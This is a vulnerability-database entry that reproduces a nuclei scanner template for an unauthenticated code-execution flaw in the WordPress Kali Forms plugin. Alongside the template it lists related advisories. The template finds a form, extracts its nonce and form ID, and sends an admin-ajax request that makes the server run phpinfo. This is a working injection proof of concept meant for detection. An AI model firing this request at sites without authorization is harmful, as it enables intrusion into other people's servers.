Lucene search
K

WordPress Kali Forms <= 2.4.9 - Remote Code Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Kali Forms plugin <=2.4.9 enables unauthenticated remote code execution due to unsafe input handling.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-3584
20 Mar 202621:25
attackerkb
Circl
CVE-2026-3584
20 Mar 202622:17
circl
CNNVD
WordPress plugin Kali Forms 代码注入漏洞
20 Mar 202600:00
cnnvd
CVE
CVE-2026-3584
20 Mar 202621:25
cve
Cvelist
CVE-2026-3584 Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process
20 Mar 202621:25
cvelist
EUVD
EUVD-2026-13814
21 Mar 202600:31
euvd
GithubExploit
Exploit for CVE-2026-3584
25 Mar 202609:21
githubexploit
NVD
CVE-2026-3584
20 Mar 202622:16
nvd
Packet Storm
📄 WordPress Kali Forms 2.4.9 Remote Code Execution
20 Apr 202600:00
packetstorm
Patchstack
WordPress Kali Forms plugin <= 2.4.9 - Unauthenticated Remote Code Execution via form_process vulnerability
23 Mar 202610:14
patchstack
Rows per page
id: CVE-2026-3584

info:
  name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution caused by unsafe user input handling in 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 2.4.9.
  reference:
    - https://wordpress.org/plugins/kali-forms/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3584
    epss-score: 0.07239
    epss-percentile: 0.93576
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 6
    product: kali-forms
    framework: wordpress
    fofa-query: body="kali-forms"
    shodan-query: http.component:"WordPress" http.html:"kali-forms"
  tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev

flow: |
  var paths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"];
  for (var i = 0; i < paths.length; i++) {
    set("form_path", paths[i]);
    if (http(1)) {
      http(2);
      break;
    }
  }

http:
  - raw:
      - |
        GET {{form_path}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "KaliFormsObject")'
          - 'contains(body, "ajax_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'ajax_nonce":"([a-f0-9]+)"'
        internal: true

      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'data-form-id="(\d+)"'
        internal: true

      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "phpinfo()</title>"
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_version
        part: body
        group: 1
        regex:
          - 'PHP Version ([0-9.]+)'
# digest: 4a0a0047304502203aa00f646a9b307da9caff214477aa98aa26f0e7754a75e5f33e4b294bfce6dc022100a8aa349dd63d13f38c57e38056c79a58870880d00aa2cf034fca856865a59c84:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Apr 2026 09:48Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.19.8
EPSS0.07239
SSVC
14